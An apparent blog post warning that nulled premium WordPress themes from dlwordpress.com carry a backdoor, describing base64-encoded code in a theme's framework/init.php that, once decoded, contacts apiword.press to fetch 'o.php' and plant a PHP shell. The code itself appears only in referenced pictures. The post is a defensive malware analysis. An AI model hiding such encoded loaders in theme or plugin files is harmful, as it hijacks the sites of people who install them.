Hi , since about two days , i started to investigate how hackers can benfits from something called nulled premium wordpress themes , every premium theme cost about 49$ when we are talking about professional template , and now you get it for FREE for no reason , this kind of offer put you in the case and ofcourse there is a benefit from it , so let’s pick up a site that provide this type of hacking wordpress themes and put it online for free , dlwordpress.com is one of the most famous sites in this category .
HOW I HAD DETECTED THEM ?
now let’s go deep together to analysis a theme already uploaded to dlwordpress site . first after download the theme zip file from here ,
let go into folder called ” framework ” and look for a file “init.php” . so the code will be shown as in picture below
as you can see you will see the install code encoded using base64 , the next step is we are going to decode this type to see where is the backdoor which is used by hackers , as shown in picture below
they are using the host called apiword.press with malicious php shell code “o.php” to drop a kind of php backdoor to hijack your wordpress site and get access into it , the risk occurs since this type of backdoor is not yet detected by clamav which is used on web hosting servers as virus scanner . so you have to do it manually for now .
i hope this proof of concept helped you to be in safe while wordpress in the most used platform in blogging , so my advise is to purchase what you want directly from the owner of template you want ,